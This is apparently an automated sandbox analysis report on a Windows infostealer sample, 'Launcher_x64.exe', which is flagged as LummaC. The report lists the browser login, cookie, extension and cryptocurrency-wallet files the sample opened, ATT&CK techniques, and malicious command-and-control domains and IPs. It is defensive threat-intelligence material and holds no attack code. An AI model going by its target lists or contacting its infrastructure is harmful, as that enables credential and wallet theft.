                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Binance
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                Source: C:\Users\user\Desktop\Launcher_x64.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                Source: C:\Users\user\Desktop\Launcher_x64.exe; Directory queried: C:\Users\user\Documents
                Source: C:\Users\user\Desktop\Launcher_x64.exe; Directory queried: C:\Users\user\Documents\DVWHKMNFNN
                Source: C:\Users\user\Desktop\Launcher_x64.exe; Directory queried: C:\Users\user\Documents\FENIVHOIKN
                Source: C:\Users\user\Desktop\Launcher_x64.exe; Directory queried: C:\Users\user\Documents\KZWFNRXYKI
                Source: C:\Users\user\Desktop\Launcher_x64.exe; Directory queried: C:\Users\user\Documents\NEBFQQYWPS
                Source: Yara match; File source: 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: Launcher_x64.exe PID: 3336, type: MEMORYSTR

                Remote Access Functionality

                Source: Yara match; File source: 00000003.00000003.2556263712.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000003.2602917926.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: 00000003.00000003.2555293768.0000000001093000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match; File source: Process Memory Space: Launcher_x64.exe PID: 3336, type: MEMORYSTR
                Source: Yara match; File source: sslproxydump.pcap, type: PCAP
                Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
                Execution: 2 Windows Management Instrumentation; 1 Native API; 1 PowerShell; Cron; Launchd; Scheduled Task
                Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Privilege Escalation: 211 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
                Defense Evasion: 11 Virtualization/Sandbox Evasion; 211 Process Injection; 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
                Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
                Discovery: 1 System Time Discovery; 141 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 1 Process Discovery; 11 File and Directory Discovery; 33 System Information Discovery
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
                Collection: 1 Screen Capture; 1 Archive Collected Data; 41 Data from Local System; 2 Clipboard Data; Keylogging; GUI Input Capture
                Command and Control: 21 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
                Source | Detection | Scanner | Label | Link
                Launcher_x64.exe | 29% | ReversingLabs | Win32.Infostealer.Generic |
                Launcher_x64.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                sendypaster.xyz | 193.143.1.9 | true | true | | unknown
                steamcommunity.com | 23.55.153.106 | true | false | | high
                lev-tolstoi.com | 172.67.157.254 | true | false | | high
                steppriflej.xyz | 193.143.1.9 | true | true | | unknown
                supporse-comment.cyou | unknown | unknown | true | | unknown
                ripe-blade.cyou | unknown | unknown | true | | unknown
                greywe-snotty.cyou | unknown | unknown | true | | unknown
                hosue-billowy.cyou | unknown | unknown | true | | unknown
                bellflamre.click | unknown | unknown | false | | high
                smash-boiling.cyou | unknown | unknown | true | | unknown
                pollution-raker.cyou | unknown | unknown | true | | unknown
                Name | Malicious | Antivirus Detection | Reputation
                sendypaster.xyz | true | | unknown
                steppriflej.xyz | true | | unknown
                smash-boiling.cyou | true | | unknown
                https://steamcommunity.com/profiles/76561199724331900 | false | | high
                ripe-blade.cyou | true | | unknown
                https://lev-tolstoi.com/api | false | | high
                greywe-snotty.cyou | true | | unknown
                supporse-comment.cyou | true | | unknown
                hosue-billowy.cyou | true | | unknown
                bellflamre.click | false | | high
                Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                      high
                                                                                                      https://s.ytimg.com;Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://lev-tolstoi.com/eLauncher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://community.fastly.steamstatic.com/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://steam.tv/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=enLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://lev-tolstoi.com/Launcher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      http://store.steampowered.com/privacy_agreement/Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://store.steampowered.com/points/shop/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              http://ocsp.rootca1.amazontrust.com0:Launcher_x64.exe, 00000003.00000003.2501359203.0000000003621000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&aLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://sketchfab.comLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://www.ecosia.org/newtab/Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://lv.queniujq.cnLauncher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://steamcommunity.com/profiles/76561199724331900/inventory/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brLauncher_x64.exe, 00000003.00000003.2502902887.000000000371B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://www.youtube.com/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://store.steampowered.com/privacy_agreement/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=engLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://support.microsofLauncher_x64.exe, 00000003.00000003.2458317534.0000000003651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&amLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://www.google.com/recaptcha/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://checkout.steampowered.com/Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesLauncher_x64.exe, 00000003.00000003.2458400920.0000000003623000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://store.steampowered.com/;Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/about/Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://steamcommunity.com/my/wishlist/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://steamcommunity.com/profiles/76561199724331900.Launcher_x64.exe, 00000003.00000002.2610718575.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://help.steampowered.com/en/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://steamcommunity.com/market/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://store.steampowered.com/news/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&l=eLauncher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://lev-tolstoi.com/apipLauncher_x64.exe, 00000003.00000003.2456252406.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Launcher_x64.exe, 00000003.00000003.2457482484.000000000363C000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2457582897.000000000363A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/Launcher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgLauncher_x64.exe, 00000003.00000003.2456444244.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433702875.000000000100E000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000002.2611002767.0000000001073000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2602917926.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2456214724.0000000001088000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2556263712.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2411971403.0000000001070000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2530628830.000000000103B000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2555293768.0000000001036000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2530449435.0000000001036000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Launcher_x64.exe, 00000003.00000003.2458400920.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2480922810.0000000003648000.00000004.00000800.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2458317534.000000000364F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://recaptcha.net/recaptcha/;Launcher_x64.exe, 00000003.00000003.2412017198.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://steamcommunity.com/discussions/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://store.steampowered.com/stats/Launcher_x64.exe, 00000003.00000003.2411971403.0000000001076000.00000004.00000020.00020000.00000000.sdmp, Launcher_x64.exe, 00000003.00000003.2433665660.000000000107F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
IP | Domain | Country | ASN | ASN Name | Malicious
172.67.157.254 | lev-tolstoi.com | United States | 13335 | CLOUDFLARENETUS | false
193.143.1.9 | sendypaster.xyz | unknown | 57271 | BITWEB-ASRU | true
23.55.153.106 | steamcommunity.com | United States | 20940 | AKAMAI-ASN1EU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579566
Start date and time: 2024-12-23 01:16:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 24s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Launcher_x64.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@6/1@11/3
EGA Information:
• Successful, ratio: 66.7%
HCA Information:
• Successful, ratio: 95%
• Number of executed functions: 44
• Number of non-executed functions: 128
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.63
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target Launcher_x64.exe, PID 4420 because there are no executed function
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
19:17:04 | API Interceptor | 18x Sleep call for process: Launcher_x64.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.67.157.254 | Armanivenntii_crypted_EASY.exe | malicious | LummaC
172.67.157.254 | aqbjn3fl.exe | malicious | LummaC
172.67.157.254 | aqbjn3fl.exe | malicious | LummaC
172.67.157.254 | v_dolg.exe | malicious | LummaC Stealer
172.67.157.254 | random.exe.6.exe | malicious | LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, Vidar
172.67.157.254 | alexshlu.exe | malicious | LummaC Stealer
172.67.157.254 | ardware-v1.exe | malicious | LummaC
172.67.157.254 | https://t.co/nq9BYOxCg9 | malicious | HTMLPhisher
193.143.1.9 | WonderHack.exe | malicious | LummaC
193.143.1.9 | Wave-Executor.exe | malicious | LummaC
23.55.153.106 | WonderHack.exe | malicious | LummaC
23.55.153.106 | Launcher.exe | malicious | LummaC
23.55.153.106 | Wave-Executor.exe | malicious | LummaC
23.55.153.106 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT
                                                                                                                                                                                                                                                                          8ZVMneG.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                            file.exeGet hashmaliciousNetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog StealerBrowse
                                                                                                                                                                                                                                                                              ji2xlo1f.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                  aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                    aqbjn3fl.exeGet hashmaliciousLummaCBrowse
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                                                      WonderHack.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      installer.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                                                      • 172.67.164.25
                                                                                                                                                                                                                                                                                      external.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.19.35
                                                                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                                                                                                                                      • 172.64.41.3
                                                                                                                                                                                                                                                                                      Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 104.21.66.86
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.151.193
                                                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                                      • 172.67.191.144
